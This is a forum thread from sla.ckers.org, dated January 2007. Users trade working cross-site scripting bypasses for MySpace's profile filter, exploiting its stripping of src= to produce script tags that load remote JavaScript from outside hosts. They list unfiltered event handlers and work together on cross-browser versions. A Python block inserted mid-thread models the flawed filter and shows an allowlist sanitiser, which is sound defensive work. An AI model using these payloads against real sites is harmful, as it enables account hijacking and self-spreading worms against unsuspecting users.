Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
MySpace 0day Again^6
Posted by: digi7al64
Date: January 11, 2007 07:22PM

Ok, so myspace took the initiative and removed all the event handlers which we have been using against them so successfully. And the worm that was released some 2 days ago has been patched (as it relied on the onload statement).

So I guess myspace devs would be feeling good atm. Ain't nobody ever going to use another event element against them again. And as for the firefox non-alpha non-digit XSS vector, meh, say goodbye to that also.

Well let me just say this... wrong.

<img stp='<embed ' srcsrc="http://imaqeshack.us/pix.gif"="http://imaqeshack.us/pix.gif" <scrisrc="y"pt/ src=//ha.ckers.org/s.js?</ssrc="y"cript>

is filtered into this
<img stp='<embed allowScriptAccess="never" allowNetworking="internal" enableJSURL="false" enableHREF="false" saveEmbedTags="true" src="http://imaqeshack.us/pix.gif" ' src="http://imaqeshack.us/pix.gif" <script/ src=//ha.ckers.org/s.js?</script></style>

I win again!

This time I achieved pwnage using (once again) their own filtering system that removed src= when it is contained in certain positions. The problem I had here was that as soon as I closed the first <script> tag the filter then ceased to work, meaning the closing </script> tag would fail, which meant the vector wouldn't work.

Then I remembered the xss cheat sheet and the non-alpha non-digit XSS vector in script tags... so I simply used that instead, got the closing </script> tag and bang, it works again.

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'



Edited 1 time(s). Last edit at 01/11/2007 07:23PM by digi7al64.

Re: MySpace 0day Again^6
Posted by: Ghozt
Date: January 11, 2007 07:39PM

Dammit, you beat me.

Well, I found a way to make <body ....onload="alert('Blah')"> work..
<BODY onmouseenteronmouseleaveonload="alert('asdf')">

But 4 periods in front of it don't work.. I also found a large list of events that Microsoft made (quite a few aren't filtered at all in Myspace), take a look: http://msdn.microsoft.com/library/default.asp?url=/workshop/author/dhtml/reference/events.asp .

Re: MySpace 0day Again^6
Posted by: Ghozt
Date: January 11, 2007 08:12PM

Ok, I was wrong. Only 5 aren't filtered:
oncut
ondataavailable
ondatasetchanged
ondatasetcomplete
ondrag
Anyways, another great find, digital.

Re: MySpace 0day Again^6
Posted by: OrbityBaby
Date: January 11, 2007 08:54PM

digi7al64 - I am going to refer to you as god from now on
;]

Re: MySpace 0day Again^6
Posted by: OrbityBaby
Date: January 11, 2007 09:18PM

digi7al64 Wrote:
-------------------------------------------------------
> Ok, so myspace took the initiative and removed all
> the event handlers which we have been using
> against them so successfully. And the worm that
> was released some 2 days ago has been patched (as
> it relied on the onload statement)
>
> So I guess myspace devs would be feeling good atm.
> Ain't nobody ever going to use another event element
> against them again. And as for the firefox
> non-alpha non-digit XSS vector, meh say goodbye to
> that also.
>
> Well let me just say this... wrong.
>
>
>
> is filtered into this
>
>
> I win again!
>
> This time I achieved pwnage using (once again)
> their own filtering system that removed src= when
> it is contained in certain positions. The problem I
> had here was that as soon as I closed the first
> tag the filter then ceased to work, meaning the
> closing tag would fail, which meant the vector
> wouldn't work.
>
> Then I remembered the xss cheat sheet and the
> non-alpha non-digit XSS vector in script tags...
> so I simply used that instead, got the closing
> tag and bang, it works again.


Thanks! I've got it working on Firefox, but that does me no good really. Is there a way to make it work on IE too?

Re: MySpace 0day Again^6
Posted by: OrbityBaby
Date: January 11, 2007 09:19PM

Ghozt Wrote:
-------------------------------------------------------
> Dammit, you beat me.
>
> Well, I found a way to make work..
>
>
> But 4 periods in front of it don't work.. I also
> found a large list of events that Microsoft made
> (quite a few aren't filtered at all in Myspace),
> take a look:
> http://msdn.microsoft.com/library/default.asp?url=
> /workshop/author/dhtml/reference/events.asp .

Thanks! I've got it working on Firefox, but that does me no good really. Is there a way to make it work on IE too?

Re: MySpace 0day Again^6
Posted by: digi7al64
Date: January 11, 2007 09:26PM

Not this particular vector, as it doesn't affect IE users... sorry.

However, I am working on a completely different vector that hopefully should be cross-browser compatible, and I will post it when I get it working (fingers crossed), providing the patching for this vector doesn't destroy it :(

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Re: MySpace 0day Again^6
Posted by: OrbityBaby
Date: January 11, 2007 09:34PM

Great, thank you. I'll keep looking back for it. ;)

Re: MySpace 0day Again^6
Posted by: Lockdown
Date: January 11, 2007 11:43PM

Again? Dude, myspace needs you on their payroll. But then again, so does every other site. Hell... the internet needs you on its payroll.

Re: MySpace 0day Again^6
Posted by: eyeced
Date: January 12, 2007 03:23PM

This is very close to the xss used by profiletracker; I think digital should give them a degree of credit.

Re: MySpace 0day Again^6
Posted by: bubbles
Date: January 12, 2007 03:48PM

The code used by profiletracker was patched. And he just changed it a little so it works again; I think it's them who should be thanking him :)

-bubbles
http://webmastertutorials.net

Re: MySpace 0day Again^6
Posted by: Lockdown
Date: January 12, 2007 11:21PM

The src ?</script> kinda screws stuff up, doesn't it? Or maybe the exploit got patched already.

Re: MySpace 0day Again^6
Posted by: r0xes
Date: January 13, 2007 01:06PM

I was just passing through the world today, you know, surfing the interwebz and all that fun stuff...
and I came across this page.

Well, I took about three minutes to go tinker, and voilà! I have got this vector working in Firefox successfully. I'm doing a tiny bit more testing while writing this post, in an attempt to get it to work in Internet Explorer.

I've probably made this more complicated than it needs to be... however, without being able to see MySpace's 3 lines of "XSS filtering", I'm not going to waste my time with making it really small [=

(NOTE!) I had this working about...10 minutes ago on Firefox and Opera. However, the _exact_ vector I was using was lost when I was attempting to add a bit more, and the next page return I accidentally copied the result again rather than the vector, so oh, fuck me.

(Still working, there's a lot of time passing right now..lol)

Okay. I wasn't really looking about five minutes ago when I started this post, but now I'm interested.
Apparently, this is working because of a script tag that is right after the "Interests" section, so the result looks like this:

"<script/ src='http://ha.ckers.org/s.js' >../_onload_='src="y"> '></td></tr><script language="JavaScript">highlightInterests("ProfileGeneral");</script>"
Since Firefox doesn't shit on me when this happens, it's all good.

Still haven't figured out getting this working with Internet Exploder. I will later, as I don't have much time now.

G'day all!


Teh simply modified vector:
<img stp='<embed ' srcsrc="http://imaqeshack.us/pix.gif"="http://imaqeshack.us/pix.gif" <scrisrc="y"pt/ src='http://ha.ckers.org/s.js'ssrc="y"rc='http://ha.ckers.org/s.js'? src='http://ha.ckers.org/s.js'?></script/onload_='src="y"> '>


~r0xes

lawlerskates and lmao missielz
http://www.r0xes.net / http://www.7na.org



Edited 1 time(s). Last edit at 01/13/2007 01:07PM by r0xes.

Re: MySpace 0day Again^6
Posted by: digi7al64
Date: January 13, 2007 09:26PM

@r0xes

try working with

<img stp='<embed ' srcsrc="http://k.us/pix.gif"="http://k.us/pix.gif" <scrisrc="y"pt>alert('xss'); var e='<embed srcsrc="http://k.us/pix.gif"="http://k.us/pix.gif" ';</ssrc="y"cript>

which will be parsed as

<img stp="&lt;embed allowScriptAccess=&quot;never&quot; allowNetworking=&quot;internal&quot; enableJSURL=&quot;false&quot; enableHREF=&quot;false&quot; saveEmbedTags=&quot;true&quot; src=&quot;http://k.us/pix.gif&quot; " src="http://k.us/pix.gif"><script>alert('xss'); var e='<embed allowScriptAccess="never" allowNetworking="internal" enableJSURL="false" enableHREF="false" saveEmbedTags="true" src="http://k.us/pix.gif" src="http://k.us/pix.gif" ';</script>

which gives you opening and closing <script> tags! Unfortunately I can't as yet get it to fire in IE... and it's the weekend so I'm spending time with my girl... so I pass the flame on to you guys to help get this working in IE.

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'
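Both of digi7al64's posts above describe the same filter weakness: src= is cut out in a single pass and the characters on either side of the hole fuse into a fresh tag. This added example (not from the thread, and not MySpace's code) models that with a toy regex filter run over the two posted vectors, beside a token-based allowlist sanitiser that cannot be spliced this way; the regex and the allowed tag set are assumptions.

```python
import html
import re
from html.parser import HTMLParser

# The two vectors digi7al64 posted in this thread, verbatim.
VECTORS = [
    '<img stp=\'<embed \' srcsrc="http://imaqeshack.us/pix.gif"="http://imaqeshack.us/pix.gif" '
    '<scrisrc="y"pt/ src=//ha.ckers.org/s.js?</ssrc="y"cript>',
    '<img stp=\'<embed \' srcsrc="http://k.us/pix.gif"="http://k.us/pix.gif" '
    '<scrisrc="y"pt>alert(\'xss\'); var e=\'<embed srcsrc="http://k.us/pix.gif"="http://k.us/pix.gif" \';</ssrc="y"cript>',
]

# Toy model (an assumption, not MySpace's code) of what the thread describes: each
# quoted src="..." is cut out in one pass and the text either side of the hole fuses.
SRC_ATTR = re.compile(r'src="[^"]*"', re.IGNORECASE)

def naive_strip(markup: str) -> str:
    return SRC_ATTR.sub("", markup)

# Allowlist sanitiser: tokenise first, then re-serialise only known tags/attributes
# from the parsed tokens, so dropping an attribute can never splice a new tag name.
ALLOWED = {"b": set(), "i": set(), "img": {"src", "alt"}}

class AllowlistSanitizer(HTMLParser):
    def __init__(self):
        super().__init__()
        self.out = []
    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED:
            return  # unknown tag dropped whole, attributes included
        kept = []
        for name, value in attrs:
            if name not in ALLOWED[tag] or value is None:
                continue
            # src must be an absolute http(s) URL; javascript:, data: etc. are rejected
            if name == "src" and not value.lower().startswith(("http://", "https://")):
                continue
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
    def handle_endtag(self, tag):
        if tag in ALLOWED and tag != "img":  # img is void, never closed
            self.out.append(f"</{tag}>")
    def handle_data(self, data):
        self.out.append(html.escape(data))  # text can never re-open a tag

def sanitize(markup: str) -> str:
    parser = AllowlistSanitizer()
    parser.feed(markup)
    parser.close()
    return "".join(parser.out)
```

Running naive_strip over the vectors reproduces the fused <script>...</script> pair the posts show, while sanitize either escapes the fragments as text or drops the unknown tags, so no script element can survive.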

Re: MySpace 0day Again^6
Posted by: Spikeman
Date: January 14, 2007 05:13PM

Do you happen to have a list of everything MySpace filters and what they turn into? It may come in handy.

Re: MySpace 0day Again^6
Posted by: Spikeman
Date: January 14, 2007 06:17PM

I'm not posting this in a new topic because it will probably be fixed if they fix yours:

<img x='<embed src="http://.gif"'<ifrasrc="x"me srcsrc="x"=javascsrc="x"ript:document.body.innersrc="x"HTML+='<scrip'+String.fromCharCode(116,32)+'s'+'rc=http://www.fileden.com/files/2006/11/27/428255/xss.txt'+String.fromCharCode(62)+'</scrip'+String.fromCharCode(116,62) />

The cool thing about this is it works in all browsers (at least in theory, I haven't tested it in all of them). I didn't use s.js because it loads in an iframe, but I'm sure if you wanted to you could break out of the frame.
